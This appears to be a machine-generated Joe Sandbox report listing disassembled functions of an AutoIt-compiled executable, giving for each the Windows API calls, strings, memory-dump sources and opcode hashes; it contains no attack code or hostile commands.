                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BA2D6F
                                                                      • LoadIconW.USER32 ref: 00BA2D85
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BA2D94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: 89dff7ec86aa9627b16f3e70ca84627a8e5f26b2b299b929abc9c2d3c388d880
                                                                      • Instruction ID: 1db19bc23099b8cbce6645c38330fe09e18854f7c3ef2235aeac71814e8b2a6f
                                                                      • Opcode Fuzzy Hash: 89dff7ec86aa9627b16f3e70ca84627a8e5f26b2b299b929abc9c2d3c388d880
                                                                      • Instruction Fuzzy Hash: A621C4B5921319AFDB00DFA8EC89BDDBBB4FB08700F04411AFA15B62A0D7B54584CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C05CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00C05CE2
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C05CFB
                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004), ref: 00C05D59
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00C05D69
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C05D7B
                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004), ref: 00C05DCF
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C05DDD
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C05DEF
                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C05E31
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00C05E44
                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C05E5A
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00C05E67
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: f1ac61c605ddf7b0c73d6341dd2b6f1811a19a4d4aa55578f750bb69e1127107
                                                                      • Instruction ID: ca8fa57b947c29638b57150983c5e5462b3b5107dcc79e2affd03a4a2f926d79
                                                                      • Opcode Fuzzy Hash: f1ac61c605ddf7b0c73d6341dd2b6f1811a19a4d4aa55578f750bb69e1127107
                                                                      • Instruction Fuzzy Hash: BA51FBB5A10619AFDF18CF68DD89BAEBBB9EB48300F148129F915E6290D7709E04CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BB8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BB8F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00BB8FC5
                                                                      • DestroyWindow.USER32 ref: 00BB8C81
                                                                      • KillTimer.USER32 ref: 00BB8D1B
                                                                      • DestroyAcceleratorTable.USER32 ref: 00BF6973
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00BB8BBA,00000000,?), ref: 00BF69A1
                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00BB8BBA,00000000,?), ref: 00BF69B8
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00BB8BBA,00000000), ref: 00BF69D4
                                                                      • DeleteObject.GDI32(00000000), ref: 00BF69E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 641708696-0
                                                                      • Opcode ID: 9145c2a85f1f4db9d6e543b513511e4376ab68105ada99f1c610e6c86a05b6f5
                                                                      • Instruction ID: eb75d58a7200ef7ff1b63fcda1c3751f2b41e30eddfcddfcc0b2425ad0b056f4
                                                                      • Opcode Fuzzy Hash: 9145c2a85f1f4db9d6e543b513511e4376ab68105ada99f1c610e6c86a05b6f5
                                                                      • Instruction Fuzzy Hash: B261DB31012604DFCB259F18C989BBD7BF5FB04312F1884ACEA469B5A0CBB1A8C5DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BB9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BB9944: GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
                                                                      • GetSysColor.USER32 ref: 00BB9862
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ColorLongWindow
                                                                      • String ID:
                                                                      • API String ID: 259745315-0
                                                                      • Opcode ID: 2897bfc5e816727288027dab07be7ac1f4f71e56c5af36775a29c3402209f22b
                                                                      • Instruction ID: 10383beb601937148f7ac33d2ceff3f7cad851ce27fb6e5e4ce9d103433005e7
                                                                      • Opcode Fuzzy Hash: 2897bfc5e816727288027dab07be7ac1f4f71e56c5af36775a29c3402209f22b
                                                                      • Instruction Fuzzy Hash: 51417C31144644AFDB215B389C88BBD3BF5EB16370F144699FAB2972E1D7B19842EB10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BDCE90 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 209COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                      • String ID: 8X
                                                                      • API String ID: 1282221369-771344844
                                                                      • Opcode ID: bf1ff3fd310610dc096577bcb3812abe5ea0652f15e8293fd69c1989570a95ce
                                                                      • Instruction ID: e40bd1277902ec4af53692416abe08fffaafe8b42ae8396c1e549099cd966c53
                                                                      • Opcode Fuzzy Hash: bf1ff3fd310610dc096577bcb3812abe5ea0652f15e8293fd69c1989570a95ce
                                                                      • Instruction Fuzzy Hash: 7B610FB1904342AFDB21AFB49895BADFFE5EF11310F1441EBE94497382F6319905D790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C096E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00BEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00C09717
                                                                      • LoadStringW.USER32(00000000,?,00BEF7F8,00000001), ref: 00C09720
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00BEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00C09742
                                                                      • LoadStringW.USER32(00000000,?,00BEF7F8,00000001), ref: 00C09745
                                                                      • MessageBoxW.USER32 ref: 00C09866
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 747408836-2268648507
                                                                      • Opcode ID: 9876fdbc3bd9fd9a4574b4215d15e5116fad168130de690a08ca188fecdaae99
                                                                      • Instruction ID: a608aea76454e3e4cfe74bd34181a7f357dbb5d2d3af4b86b9d41a73cf8eb75d
                                                                      • Opcode Fuzzy Hash: 9876fdbc3bd9fd9a4574b4215d15e5116fad168130de690a08ca188fecdaae99
                                                                      • Instruction Fuzzy Hash: 10414F72804219AACF14EBE0CD86EEEB7B8EF16740F1440A5F50572092EF356F49DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C006DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C007A2
                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C007BE
                                                                      • RegOpenKeyExW.ADVAPI32 ref: 00C007DA
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00C00804
                                                                      • CLSIDFromString.OLE32(?,000001FE), ref: 00C0082C
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C00837
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C0083C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 323675364-22481851
                                                                      • Opcode ID: af343ffce847e13f26031f2ee4bc0a567941afa2bb7f0ffab856165390171b46
                                                                      • Instruction ID: 1b23f7332a91dd2a089fb6fa36484493de37607fd06dcf35ee7ef0e1a5fbbabc
                                                                      • Opcode Fuzzy Hash: af343ffce847e13f26031f2ee4bc0a567941afa2bb7f0ffab856165390171b46
                                                                      • Instruction Fuzzy Hash: 3D411972C14229ABCF15EBA4DC85EEDB7B8BF04750F554169E911B31A1EB345E04CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C17A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 00C17AF3
                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C17B8F
                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00C17BA3
                                                                      • CoCreateInstance.OLE32(00C3FD08,00000000,00000001,00C66E6C,?), ref: 00C17BEF
                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C17C74
                                                                      • CoTaskMemFree.OLE32(?), ref: 00C17CCC
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00C17D57
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C17D7A
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C17D81
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C17DD6
                                                                      • CoUninitialize.OLE32 ref: 00C17DDC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2762341140-0
                                                                      • Opcode ID: 5dcedba67548b70f907978a7bdf149956b1f74b9ef60380dc57f1903e8c27de7
                                                                      • Instruction ID: 0c8d50c271c0d177dbf5100e69326934599bd6c384ebb28dd926aaa14122426d
                                                                      • Opcode Fuzzy Hash: 5dcedba67548b70f907978a7bdf149956b1f74b9ef60380dc57f1903e8c27de7
                                                                      • Instruction Fuzzy Hash: 93C12C75A04109AFCB14DF64C898DAEBBF5FF49304B148599F816DB261D730EE81DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C3541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C35504
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C35515
                                                                      • CharNextW.USER32(00000158), ref: 00C35544
                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C35585
                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C3559B
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C355AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CharNext
                                                                      • String ID:
                                                                      • API String ID: 1350042424-0
                                                                      • Opcode ID: efccf3fe8b2a7243fb699121f2e4c620bc7f0e88ca799ad28e1ee09a49c9274d
                                                                      • Instruction ID: 29ec1b69d9c06257b20f639e58d91bc3ca8ef4e8d88536e3ae29c6d9a780d873
                                                                      • Opcode Fuzzy Hash: efccf3fe8b2a7243fb699121f2e4c620bc7f0e88ca799ad28e1ee09a49c9274d
                                                                      • Instruction Fuzzy Hash: 5D618B71920608AFDF10DF95CC85AFE7BB9EB0A720F108145F925AA291D7749B81DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BFFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00BFFAAF
                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00BFFB08
                                                                      • VariantInit.OLEAUT32(?), ref: 00BFFB1A
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00BFFB3A
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00BFFB8D
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00BFFBA1
                                                                      • VariantClear.OLEAUT32(?), ref: 00BFFBB6
                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00BFFBC3
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BFFBCC
                                                                      • VariantClear.OLEAUT32(?), ref: 00BFFBDE
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BFFBE9
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID:
                                                                      • API String ID: 2706829360-0
                                                                      • Opcode ID: 6ea4461533c49638caf138d1abcb2a467e163b4ef4e414254c053f8f893229c0
                                                                      • Instruction ID: 5255023fa8642b312e561d6b6431156310d414f604a980a7bee255e8054cf72a
                                                                      • Opcode Fuzzy Hash: 6ea4461533c49638caf138d1abcb2a467e163b4ef4e414254c053f8f893229c0
                                                                      • Instruction Fuzzy Hash: 64412135A0021A9FCF10DF64D894ABDBBB9EF48354F008065E955A7261DB34E945CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00C205BC
                                                                      • inet_addr.WSOCK32(?), ref: 00C2061C
                                                                      • gethostbyname.WSOCK32(?), ref: 00C20628
                                                                      • IcmpCreateFile.IPHLPAPI ref: 00C20636
                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C206C6
                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C206E5
                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00C207B9
                                                                      • WSACleanup.WSOCK32 ref: 00C207BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                      • String ID: Ping
                                                                      • API String ID: 1028309954-2246546115
                                                                      • Opcode ID: e81e8ddff69f8c46f97e28b6d8fc4059b51a375c3dbabdbb92286ee97142a40b
                                                                      • Instruction ID: 32f53fc2779a8b52fadc0214dba9eb280aa9ef97272c50ab9c3270794964ee6c
                                                                      • Opcode Fuzzy Hash: e81e8ddff69f8c46f97e28b6d8fc4059b51a375c3dbabdbb92286ee97142a40b
                                                                      • Instruction Fuzzy Hash: 03919D356082119FD320DF15D888F1ABBE0EF45718F2485AAF4699BAA3C770EE45CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C28CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharLower
                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                      • API String ID: 707087890-567219261
                                                                      • Opcode ID: 1c53385dea7dd9c73ba0bad58baeb60c063ad68904a91198ae50746a9a29e12f
                                                                      • Instruction ID: da93edcc0b84195bd5f8e4667ed6ca49ba4759488904aafad1286b04ef03437b
                                                                      • Opcode Fuzzy Hash: 1c53385dea7dd9c73ba0bad58baeb60c063ad68904a91198ae50746a9a29e12f
                                                                      • Instruction Fuzzy Hash: 9D51D236A051279BCF24DF6CD8809BEB3E5BF65724B214229E426E76C4DB30DE48C790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoInitialize.OLE32 ref: 00C23774
                                                                      • CoUninitialize.OLE32 ref: 00C2377F
                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00C3FB78,?), ref: 00C237D9
                                                                      • IIDFromString.OLE32(?,?), ref: 00C2384C
                                                                      • VariantInit.OLEAUT32(?), ref: 00C238E4
                                                                      • VariantClear.OLEAUT32(?), ref: 00C23936
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
